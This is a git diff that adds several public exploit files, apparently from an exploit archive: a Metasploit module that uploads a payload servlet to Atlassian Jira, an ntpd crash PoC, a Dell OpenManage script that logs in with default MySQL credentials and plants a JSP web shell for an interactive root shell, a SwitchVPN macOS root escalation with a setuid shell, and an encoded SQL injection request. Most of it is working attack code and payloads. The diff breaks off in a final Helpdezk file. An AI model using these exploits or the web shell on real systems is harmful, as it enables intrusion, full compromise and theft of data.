diff --git a/exploits/java/remote/45851.rb b/exploits/java/remote/45851.rb
new file mode 100755
index 000000000..08d8a95b5
--- /dev/null
+++ b/exploits/java/remote/45851.rb
@@ -0,0 +1,233 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Atlassian Jira Authenticated Upload Code Execution',
+ 'Description' => %q{
+ This module can be used to execute a payload on Atlassian Jira via
+ the Universal Plugin Manager(UPM). The module requires valid login
+ credentials to an account that has access to the plugin manager.
+ The payload is uploaded as a JAR archive containing a servlet using
+ a POST request against the UPM component. The check command will
+ test the validity of user supplied credentials and test for access
+ to the plugin manager.
+ },
+ 'Author' => 'Alexander Gonzalez(dubfr33)',
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'],
+ ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'],
+ ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/']
+ ],
+ 'Platform' => %w[java],
+ 'Targets' =>
+ [
+ ['Java Universal',
+ {
+ 'Arch' => ARCH_JAVA,
+ 'Platform' => 'java'
+ }
+ ]
+ ],
+ 'DisclosureDate' => 'Feb 22 2018'))
+
+ register_options(
+ [
+ Opt::RPORT(2990),
+ OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
+ OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
+ OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
+ ])
+ end
+
+ def check
+ login_res = query_login
+ if login_res.nil?
+ vprint_error('Unable to access the web application!')
+ return CheckCode::Unknown
+ end
+ return CheckCode::Unknown unless login_res.code == 200
+ @session_id = get_sid(login_res)
+ @xsrf_token = login_res.get_html_document.at('meta[@id="atlassian-token"]')['content']
+ auth_res = do_auth
+ good_sid = get_sid(auth_res)
+ good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}"
+ res = query_upm(good_cookie)
+ if res.nil?
+ vprint_error('Unable to access the web application!')
+ return CheckCode::Unknown
+ elsif res.code == 200
+ return Exploit::CheckCode::Appears
+ else
+ vprint_status('Something went wrong, make sure host is up and options are correct!')
+ vprint_status("HTTP Response Code: #{res.code}")
+ return Exploit::CheckCode::Unknown
+ end
+ end
+
+ def exploit
+ unless access_login?
+ fail_with(Failure::Unknown, 'Unable to access the web application!')
+ end
+ print_status('Retrieving Session ID and XSRF token...')
+ auth_res = do_auth
+ good_sid = get_sid(auth_res)
+ good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}"
+ res = query_for_upm_token(good_cookie)
+ if res.nil?
+ fail_with(Failure::Unknown, 'Unable to retrieve UPM token!')
+ end
+ upm_token = res.headers['upm-token']
+ upload_exec(upm_token, good_cookie)
+ end
+
+ # Upload, execute, and remove servlet
+ def upload_exec(upm_token, good_cookie)
+ contents = ''
+ name = Rex::Text.rand_text_alpha(8..12)
+
+ atlassian_plugin_xml = %Q{
+
+
+
+ 1.0
+
+
+ /plugins/servlet/metasploit/PayloadServlet
+ /plugins/servlet/metasploit/PayloadServlet
+
+
+
+
+ "#{name}"
+ /metasploit/PayloadServlet
+
+
+
+ }
+
+ # Generates .jar file for upload
+ zip = payload.encoded_jar
+ zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
+
+ servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
+ zip.add_file('/metasploit/PayloadServlet.class', servlet)
+
+ contents = zip.pack
+
+ boundary = rand_text_numeric(27)
+
+ data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"plugin\"; "
+ data << "filename=\"#{name}.jar\"\r\nContent-Type: application/x-java-archive\r\n\r\n"
+ data << contents
+ data << "\r\n--#{boundary}--"
+
+ print_status("Attempting to upload #{name}")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'rest/plugins/1.0/'),
+ 'vars_get' =>
+ {
+ 'token' => "#{upm_token}"
+ },
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>
+ {
+ 'Content-Type' => 'multipart/form-data; boundary=' + boundary,
+ 'Cookie' => good_cookie.to_s
+ }
+ }, 25)
+
+ unless res && res.code == 202
+ print_status("Error uploading #{name}")
+ print_status("HTTP Response Code: #{res.code}")
+ print_status("Server Response: #{res.body}")
+ return
+ end
+
+ print_status("Successfully uploaded #{name}")
+ print_status("Executing #{name}")
+ Rex::ThreadSafe.sleep(3)
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
+ 'method' => 'GET',
+ 'cookie' => good_cookie.to_s
+ })
+
+ print_status("Deleting #{name}")
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
+ 'method' => 'DELETE',
+ 'cookie' => good_cookie.to_s
+ })
+ end
+
+ def access_login?
+ res = query_login
+ if res.nil?
+ fail_with(Failure::Unknown, 'Unable to access the web application!')
+ end
+ return false unless res && res.code == 200
+ @session_id = get_sid(res)
+ @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
+ return true
+ end
+
+ # Sends GET request to login page so the HTTP response can be used
+ def query_login
+ send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'))
+ end
+
+ # Queries plugin manager to verify access
+ def query_upm(good_cookie)
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'),
+ 'method' => 'GET',
+ 'cookie' => good_cookie.to_s
+ })
+ end
+
+ # Queries API for response containing upm_token
+ def query_for_upm_token(good_cookie)
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),
+ 'method' => 'GET',
+ 'cookie' => good_cookie.to_s
+ })
+ end
+
+ # Authenticates to webapp with user supplied credentials
+ def do_auth
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'),
+ 'method' => 'POST',
+ 'cookie' => "atlassian.xsrf.token=#{@xsrf_token}; #{@session_id}",
+ 'vars_post' => {
+ 'os_username' => datastore['HttpUsername'],
+ 'os_password' => datastore['HttpPassword'],
+ 'os_destination' => '',
+ 'user_role' => '',
+ 'atl_token' => '',
+ 'login' => 'Log+In'
+ }
+ })
+ end
+
+ # Finds SID from HTTP response headers
+ def get_sid(res)
+ if res.nil?
+ return '' if res.blank?
+ end
+ res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/45846.py b/exploits/linux/local/45846.py
new file mode 100755
index 000000000..f0499fc2b
--- /dev/null
+++ b/exploits/linux/local/45846.py
@@ -0,0 +1,60 @@
+# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)
+# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam
+# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
+# Website: https://dumpco.re/blog/cve-2018-7182
+# Vendor Homepage: http://www.ntp.org/
+# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz
+# Version: ntp 4.2.8p6 - 4.2.8p10
+# CVE: CVE-2018-7182
+
+# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind
+#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf
+#==50079== Memcheck, a memory error detector
+#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
+#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
+#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
+#==50079==
+#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting
+#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf
+#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19)
+#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log
+#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123
+#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123
+#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123
+#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123
+#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123
+#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123
+#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates
+#==50079== Invalid read of size 1
+#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd
+#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
+#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692)
+#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)
+#==50079==
+
+#!/usr/bin/env python
+
+import sys
+import socket
+
+buf = ("\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\x39\x6e\x6f\x6e\x63" +
+ "\x65\x3d\x64\x61\x33\x65\x62\x35\x31\x65\x62\x30\x32\x38\x38\x38" +
+ "\x64\x61\x32\x30\x39\x36\x34\x31\x39\x63\x2c\x20\x66\x72\x61\x67" +
+ "\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x00\x31\x32\x37\x2e" +
+ "\x30\x2e\x30\x2e\x31\x00\x00\x00")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.sendto(buf, ('127.0.0.1', 123))
\ No newline at end of file
diff --git a/exploits/linux/webapps/45852.py b/exploits/linux/webapps/45852.py
new file mode 100755
index 000000000..e74f0779d
--- /dev/null
+++ b/exploits/linux/webapps/45852.py
@@ -0,0 +1,227 @@
+'''
+KL-001-2018-009 : Dell OpenManage Network Manager Multiple Vulnerabilities
+
+Title: Dell OpenManage Network Manager Multiple Vulnerabilities
+Advisory ID: KL-001-2018-009
+Publication Date: 2018.11.05
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-009.txt
+
+
+1. Vulnerability Details
+
+ Affected Vendor: Dell
+ Affected Product: OpenManage Network Manager
+ Affected Version: 6.2.0.51 SP3
+ Platform: Embedded Linux
+ CWE Classification: CWE-285: Improper Authorization,
+ CWE-284: Improper Access Control
+ Impact: Privilege Escalation
+ Attack vector: MySQL, HTTP
+ CVE ID: CVE-2018-15767, CVE-2018-15768
+
+2. Vulnerability Description
+
+ Dell OpenManage Network Manager exposes a MySQL listener that
+ can be accessed with default credentials (CVE-2018-15768). This
+ MySQL service is running as the root user, so an attacker can
+ exploit this configuration to, e.g., deploy a backdoor and
+ escalate privileges into the root account (CVE-2018-15767).
+
+
+3. Technical Description
+
+ The appliance binds on 3306/mysql using the 0.0.0.0 IP
+ address. The default IPTables policy is ACCEPT and the
+ rule table is empty. Using any of three default accounts,
+ a malicious user can exploit native MySQL functionality to
+ place a JSP shell into the directory of a web server on the
+ file system and subsequently make calls into it.
+
+
+4. Mitigation and Remediation Recommendation
+
+ The vendor informed KoreLogic that all default passwords can
+ be changed and are documented in the OpenManage Network Manager
+ Installation Guide. Dell recommends all customers change these
+ default passwords upon installation.
+
+ The vendor has addressed these vulnerabilities in version
+ 6.5.3. Release notes and download instructions can be found at:
+
+ https://www.dell.com/support/home/us/en/04/drivers/driversdetails?driverId=5XC0J
+
+
+5. Credit
+
+ This vulnerability was discovered by Matt Bergin (@thatguylevel)
+ of KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+ 2018.02.16 - KoreLogic submits vulnerability details to Dell.
+ 2018.02.16 - Dell acknowledges receipt.
+ 2018.04.02 - Dell informs KoreLogic that a rememdiation plan is in
+ place and requests approximately two months continued
+ embargo on the vulnerability details.
+ 2018.04.23 - 45 business days have elapsed since the vulnerability
+ was reported to Dell.
+ 2018.05.14 - 60 business days have elapsed since the vulnerability
+ was reported to Dell.
+ 2018.06.05 - 75 business days have elapsed since the vulnerability
+ was reported to Dell.
+ 2018.06.11 - Dell informs KoreLogic that the patched version has
+ been released and asks that the KoreLogic advisory
+ remain unpublished until 2018.06.22.
+ 2018.06.21 - Dell requests additional time to coordinate changes
+ to the MySQL implementation, noting that this
+ driver is provided by and upstream vendor.
+ 2018.07.11 - 100 business days have elapsed since the
+ vulnerability was reported to Dell.
+ 2018.07.16 - Dell informs KoreLogic that the remediations are
+ targeted for version 6.5.3, slated for a September
+ release.
+ 2018.08.08 - 120 business days have elapsed since the
+ vulnerability was reported to Dell.
+ 2018.09.20 - 150 business days have elapsed since the
+ vulnerability was reported to Dell.
+ 2018.10.03 - Dell informs KoreLogic that version 6.5.3 is
+ scheduled to be released 2018.10.08.
+ 2018.10.11 - Dell and KoreLogic begin mutual review of
+ disclosure statements.
+ 2018.11.02 - Dell issues public advisory-
+ https://www.dell.com/support/article/us/en/19/sln314610;
+ 180 business days have elapsed since the
+ vulnerability was reported to Dell.
+ 2018.11.05 - KoreLogic Disclosure.
+
+7. Proof of Concept
+'''
+
+ #!/usr/bin/python
+
+ # $ python dell-openmanage-networkmanager_rce.py --host 1.3.3.7
+ # Dell OpenManage NetworkManager 6.2.0.51 SP3
+ # SQL backdoor remote root
+ #
+ # [-] Starting attack.
+ # [+] Connected using root account.
+ # [+] Sending malicious SQL.
+ # [+] Dropping shell.
+ # [-] uid=0(root) gid=0(root) groups=0(root)
+ #
+ # # uname -a
+ # Linux synergy.domain.int 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+
+ from optparse import OptionParser
+ from string import ascii_letters, digits
+ from random import choice
+ from re import compile as regex_compile
+ from urllib import urlopen
+ import pymysql.cursors
+
+ banner = """Dell OpenManage NetworkManager 6.2.0.51 SP3\nSQL backdoor remote root\n"""
+ accounts = ['root','owmeta','oware']
+ password = 'dorado'
+ regex = regex_compile("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
+
+ full_path = '/opt/VAroot/dell/openmanage/networkmanager/oware/synergy/tomcat-7.0.40/webapps/nvhelp/%s.jsp' % (''.join(
+ [choice(digits + ascii_letters) for i in xrange(8)]))
+ shell_name = full_path.split('/')[-1]
+
+ backdoor = """<%@ page import="java.util.*,java.io.*"%>
+ <%
+ if (request.getParameter("cmd") != null) {
+ String m = request.getParameter("cmd");
+ Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+ OutputStream os = p.getOutputStream();
+ InputStream in = p.getInputStream();
+ DataInputStream dis = new DataInputStream(in);
+ String disr = dis.readLine();
+ while ( disr != null ) {
+ out.println(disr);
+ disr = dis.readLine();
+ }
+ }
+ %>
+
+ def do_shell(ip_address):
+ fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % ('sudo sh -c id'))
+ print "[-] %s\n" % fd.read().strip()
+ fd.close()
+ while True:
+ try:
+ cmd = 'sudo sh -c %s' % raw_input("# ")
+ if ('exit' in cmd or 'quit' in cmd):
+ break
+ fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % (cmd))
+ print fd.read().strip()
+ fd.close()
+ except KeyboardInterrupt:
+ print "Exiting."
+ exit(0)
+ return False
+
+ if __name__=="__main__":
+ print banner
+ parser = OptionParser()
+ parser.add_option("--host",dest="host",default=None,help="Target IP address")
+ o, a = parser.parse_args()
+ if o.host is None:
+ print "[!] Please provide the required parameters."
+ exit(1)
+ elif not regex.match(o.host):
+ print "[!] --host must contain an IP address."
+ exit(1)
+ else:
+ print "[-] Starting attack."
+ try:
+ for user in accounts:
+ conn = pymysql.connect(host=o.host,
+ user=user,
+ password=password,
+ db='mysql',
+ cursorclass=pymysql.cursors.DictCursor
+ )
+ if conn.user is user:
+ print "[+] Connected using %s account." % (user)
+ cursor = conn.cursor()
+ print "[+] Sending malicious SQL."
+ table_name = ''.join(
+ [choice(digits + ascii_letters) for i in xrange(8)])
+ column_name = ''.join(
+ [choice(digits + ascii_letters) for i in xrange(8)])
+ cursor.execute('create table %s (%s text)' % (table_name, column_name))
+ cursor.execute("insert into %s (%s) values ('%s')" % (table_name, column_name, backdoor))
+ conn.commit()
+ cursor.execute('select * from %s into outfile "%s" fields escaped by ""' % (table_name,full_path))
+ cursor.execute('drop table if exists `%s`' % (table_name))
+ conn.commit()
+ cursor.execute('flush logs')
+ print "[+] Dropping shell."
+ do_shell(o.host)
+ break
+ except Exception as e:
+ if e[0] == '1045':
+ print "[!] Hardcoded SQL credentials failed." % (e)
+ else:
+ print "[!] Could not execute attack. Reason: %s." % (e)
+ exit(0)
+
+'''
+The contents of this advisory are copyright(c) 2018
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
+'''
\ No newline at end of file
diff --git a/exploits/macos/local/45854.txt b/exploits/macos/local/45854.txt
new file mode 100644
index 000000000..219828590
--- /dev/null
+++ b/exploits/macos/local/45854.txt
@@ -0,0 +1,230 @@
+=======================================================================
+Title: Privilege Escalation Vulnerability
+Product: SwitchVPN for MacOS
+Vulnerable version: 2.1012.03
+CVE ID: CVE-2018-18860
+Impact: Critical
+Homepage: https://switchvpn.net/
+Identified: 2018-09-29
+By: Bernd Leitner (bernd.leitner [at] gmail dot com)
+=======================================================================
+
+Vendor description:
+-------------------
+"By 2015 we were frustrated that the free internet we loved was under
+threat.
+As experts in online security we believed we could solve this problem. So we
+came together as a team to make SwitchVPN, a simple and powerful app to keep
+the internet free. SwitchVPN is simple. Install it on your phone, tablet or
+laptop, then just switch it on to keep the internet free. SwitchVPN is
+powerful.
+Our exclusive VPN Service technology is constantly being upgraded by a
+dedicated
+team of internet security experts."
+
+Source: https://switchvpn.net/
+
+
+Business recommendation:
+------------------------
+By exploiting the vulnerability documented in this advisory, an attacker
+can fully compromise a MacOS system with an installation of the SwitchVPN
+client.
+
+Users are urged to uninstall the SwitchVPN client for MacOS until the
+issues have
+been fixed.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Privilege Escalation Vulnerability (reserved CVE-2018-18860)
+
+After installation or an update, the script "fix_permissions.sh" is run by
+the application. This script changes the owner of the main application
+binaries
+to root and sets them to world-writable. Additionally, the SUID bit is set
+for
+another sensitive binary in the application folder. This configuration
+makes it
+very easy to escalate privileges to root.
+
+After the installation or update of SwitchVPN, the following script is run:
+
+============================================================================================
+...
+switchvpn_updater.dat
+mb:MacOS b$ file switchvpn_updater.dat
+switchvpn_updater.dat: Qt Binary Resource file
+...
+if (systemInfo.kernelType === "darwin") {
+ console.log("Run permissions\n");
+ component.addElevatedOperation("Execute",
+"/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/fix_permissions.sh");
+}
+...
+============================================================================================
+mb:MacOS b$ cat fix_permissions.sh
+#!/bin/sh
+
+chown -R root /Applications/SwitchVPN/SwitchVPN.app/
+chgrp -R admin /Applications/SwitchVPN/SwitchVPN.app/
+chmod -R 777 /Applications/SwitchVPN/SwitchVPN.app/
+chmod -R u+s /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/compose8
+============================================================================================
+
+This leads to an overpermissive application configuration:
+
+============================================================================================
+mb:MacOS b$ ls -al
+total 18720
+drwxrwxrwx 35 root admin 1120 Sep 29 20:39 .
+drwxrwxrwx 16 root admin 512 Sep 29 20:39 ..
+-rwxrwxrwx 1 root admin 106224 Oct 12 2017 SwitchVPN
+-rwxrwxrwx 1 root admin 4693216 Oct 12 2017 SwitchVPN_GUI
+-r-xr-xr-x 1 root wheel 2859376 Oct 12 2017 compose
+-r-xr-xr-x 1 root wheel 29184 Oct 12 2017 compose10
+-r-xr-xr-x 1 root wheel 29184 Oct 12 2017 compose11
+-r-xr-xr-x 1 root wheel 59152 Oct 12 2017 compose3
+-r-xr-xr-x 1 root wheel 39008 Oct 12 2017 compose4
+-r-xr-xr-x 1 root wheel 587776 Oct 12 2017 compose6
+-r-xr-xr-x 1 root wheel 278848 Oct 12 2017 compose7
+-r-sr-xr-x 1 root wheel 22800 Oct 12 2017 compose8
+-r-xr-xr-x 1 root wheel 19056 Oct 12 2017 compose9
+-r-xr-xr-x 1 root wheel 132160 Oct 12 2017 composec
+-r-xr-xr-x 1 root wheel 510464 Oct 12 2017 composecn
+-r-xr-xr-x 1 root wheel 5632 Oct 12 2017 down.sh
+-rwxrwxrwx 1 root admin 245 Oct 12 2017 fix_permissions.sh
+-rw-r--r-- 1 root admin 56 Sep 29 20:39 log.txt
+-r-xr-xr-x 1 root wheel 39050 Oct 12 2017 up.sh
+============================================================================================
+
+Further investigation shows, that the "SwitchVPN_GUI" binary is run as root:
+
+============================================================================================
+mb:MacOS b$ ps aux | grep -i switch
+root 15165 4.6 0.4 4515952 72912 ?? S 8:39PM
+ 0:08.84 SwitchVPN_GUI
+============================================================================================
+
+After statically analysing the "SwitchVPN" binary, it became clear, that it
+runs the "compose8" SUID root binary. Further analysis showed, that
+"compose8"
+subsequently runs the "SwitchVPN_GUI" binary and since it's world-writable,
+an
+attacker can exploit the situation to escalate privileges.
+
+============================================================================================
+# SwitchVPN -> compose8
+...add rdx, [rdx+10h]
+lea rsi, aCompose8_0 ; "compose8"
+lea rcx, aSwitchvpn ; "SwitchVPN"
+xor r9d, r9d
+xor eax, eax
+mov rdi, rbx ; char *
+mov r8, r14
+call _execl
+...
+============================================================================================
+
+============================================================================================
+# compose8 -> SwitchVPN_GUI
+...
+lea rsi, aCompose8WillIn ; "Compose8 will invoke GUI app %s, %s\n"
+xor eax, eax
+mov rdx, rbx
+mov rcx, r12
+call _fprintf
+cmp r15d, 4
+lea rdx, aB ; "-b"
+cmovnz rdx, r14
+xor ecx, ecx
+xor eax, eax
+mov rdi, rbx ; char *
+mov rsi, r12 ; char *
+call _execl
+...
+============================================================================================
+
+Running the "SwitchVPN" binary from the command line confirms the issue:
+
+============================================================================================
+./SwitchVPN
+This app (compose8) invoked with args:
+/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS, SwitchVPN
+Compose8 will invoke GUI app
+/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/SwitchVPN_GUI,
+SwitchVPN_GUI
+============================================================================================
+
+
+Proof of concept:
+-----------------
+1) Privilege Escalation Vulnerability
+A situation like the one described above provides a wide range of
+possibilities for escalating privileges to root. A quick and easy way is to
+write the following shell script to "SwitchVPN_GUI":
+
+============================================================================================
+#!/bin/bash
+chown root /tmp/shell
+chmod 4755 /tmp/shell
+============================================================================================
+
+Create and compile the following execve() based shell:
+
+============================================================================================
+#include
+#include
+main () {
+ setuid(0);
+ seteuid(0);
+ setgid(0);
+ execve("/bin/sh", 0, 0);
+}
+
+gcc shell.c -o shell
+============================================================================================
+
+Copy the shell binary to an attacker controlled location (e.g. /tmp).
+Start the "SwitchVPN.app" as a local, unprivileged user. Afterwards the
+execution of /tmp/shell will drop the user/attacker to a root shell:
+
+============================================================================================
+-rwsr-xr-x 1 root wheel 8576 Sep 29 20:34 shell
+-rw-r--r-- 1 b wheel 127 Sep 29 20:33 shell.c
+
+bash-3.2$ whoami
+b
+bash-3.2$ ./shell
+bash-3.2# whoami
+root
+============================================================================================
+
+
+Vulnerable / tested versions:
+-----------------------------
+The following version has been tested and found to be vulnerable: 2.1012.03.
+Earlier versions might be vulnerable as well.
+
+
+Vendor contact timeline:
+------------------------
+2018-10-04: Requested security contact via https://switchvpn.net
+2018-10-10: Contacted vendor through mark@switchvpn.com
+2018-10-17: Requested status update from vendor
+2018-10-30: Sent new contact details & public PGP key to mark@switchvpn.com
+2018-10-31: Requested status update from vendor
+2018-11-12: Informed vendor about advisory release
+
+Solution:
+---------
+None.
+
+
+Workaround:
+-----------
+None.
+
+
+EOF B. Leitner / @2018
\ No newline at end of file
diff --git a/exploits/php/webapps/45845.txt b/exploits/php/webapps/45845.txt
new file mode 100644
index 000000000..eb9fd7b24
--- /dev/null
+++ b/exploits/php/webapps/45845.txt
@@ -0,0 +1,36 @@
+# Exploit Title: iServiceOnline 1.0 - 'r' SQL Injection
+# Dork: N/A
+# Date: 2018-11-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/iserviceonline/
+# Software Link: https://netcologne.dl.sourceforge.net/project/iserviceonline/iService_Eng.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/app/index.php?r=Report/Repair
+#
+POST /[PATH]/app/index.php?r=Report/Repair HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 645
+year=2018%20%61%6e%44%20%28%53%45%4c%65%63%74%20%31%35%35%20%46%72%6f%4d%28%53%45%4c%45%43%54%20%43%4f%75%6e%74%28%2a%29%2c%43%4f%6e%63%61%54%28%63%6f%6e%43%41%54%28%30%78%32%30%33%61%32%30%2c%55%73%65%52%28%29%2c%44%61%74%41%42%41%53%45%28%29%2c%56%45%72%53%49%6f%4e%28%29%29%2c%30%78%37%65%2c%28%73%65%6c%65%43%54%20%28%65%6c%54%28%31%35%35%3d%31%35%35%2c%31%29%29%29%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%66%6c%6f%4f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%66%72%4f%4d%20%49%4e%46%6f%72%6d%41%54%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%4c%75%67%49%4e%53%20%47%72%6f%55%50%20%42%59%20%78%29%61%29
+HTTP/1.1 500 CDbException
+Date: Mon, 12 Nov 2018 14:02:04 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=h1lhf4nk6tjttk3ohei1a4ikn1; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
\ No newline at end of file
diff --git a/exploits/php/webapps/45847.txt b/exploits/php/webapps/45847.txt
new file mode 100644
index 000000000..d1bd2b116
--- /dev/null
+++ b/exploits/php/webapps/45847.txt
@@ -0,0 +1,88 @@
+# Exploit Title: Helpdezk 1.1.1 - 'query' SQL Injection
+# Dork: N/A
+# Date: 2018-11-13
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.helpdezk.org/
+# Software Link: https://netcologne.dl.sourceforge.net/project/helpdezk/helpdezk-1.1.1.zip
+# Version: 1.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
